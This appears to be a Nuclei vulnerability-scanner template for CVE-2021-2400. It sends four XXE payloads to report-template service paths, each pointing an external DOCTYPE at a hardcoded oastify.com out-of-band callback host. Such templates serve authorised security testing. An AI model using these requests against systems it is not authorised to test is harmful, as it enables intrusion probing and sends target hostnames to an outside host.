id: CVE_2021_2400

info:
  name: CVE-2021–2400
  author: Excis3
  severity: Critical
  description: Discover services to Executes an XXE attack
  
requests:
  - raw:
    - |
        POST /xmlpserver/ReportTemplateService.xls HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml; charset=UTF-8

        <!DOCTYPE soap:envelope PUBLIC '-//B/A/EN' 'http://{{Hostname}}.1.mf520mex38vlddi7gbzc2g2jpav4ju7j.oastify.com'>

    - |
        POST /xmlpserver/services/x/ReportTemplateService.xls  HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml; charset=UTF-8

        <!DOCTYPE soap:envelope PUBLIC '-//B/A/EN' 'http://{{Hostname}}.2.mf520mex38vlddi7gbzc2g2jpav4ju7j.oastify.com'>

    - |
        POST /mobile/ReportTemplateService.xls HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml; charset=UTF-8

        <!DOCTYPE soap:envelope PUBLIC '-//B/A/EN' 'http://{{Hostname}}.3.mf520mex38vlddi7gbzc2g2jpav4ju7j.oastify.com'>

    - |
        POST /mobile/services/x/ReportTemplateService.xls HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml; charset=UTF-8

        <!DOCTYPE soap:envelope PUBLIC '-//B/A/EN' 'http://{{Hostname}}.4.mf520mex38vlddi7gbzc2g2jpav4ju7j.oastify.com'>
